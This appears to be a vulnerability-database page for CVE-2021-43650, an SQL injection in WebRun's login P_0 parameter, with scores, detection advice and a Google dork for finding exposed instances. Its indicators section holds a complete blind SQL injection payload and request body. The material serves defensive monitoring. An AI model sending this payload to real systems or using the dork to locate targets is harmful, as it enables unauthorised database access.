CVE-2021-43650
published 2022-03-22CVE-2021-43650: WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.
PriorityP264critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
6.16%
92.6th percentile
WebRun 3.6.0.42 is vulnerable to SQL Injection via the P_0 parameter used to set the username during the login process.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softwell | webrun | — | — |
Detection & IOCsextracted from sources · hover to see the quote
otherP_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd↗
commandaction=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd↗
- →Monitor POST requests to the login endpoint for SQL injection patterns in the P_0 parameter, specifically CAST/CHR-based blind SQLi payloads targeting a PostgreSQL backend. ↗
- →Alert on POST body containing 'action=executeRule' combined with 'ruleName=GES_FLX_Gerar+Token+Dashboard' and SQL metacharacters in P_0, as this is the specific rule endpoint abused during exploitation. ↗
- →Detect the canary string 'qvvxq1qbzbq' in HTTP responses, which confirms successful exploitation of the PostgreSQL CAST-based error injection. ↗
- →Use the Google Dork 'intitle:"Webrun 3.6.0.42"' to identify exposed vulnerable instances for asset inventory and attack surface reduction. ↗
- ·The vulnerable parameter P_0 is submitted via POST body (not URL query string); network inspection rules must inspect POST body content to detect this attack. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2022-03-22
Published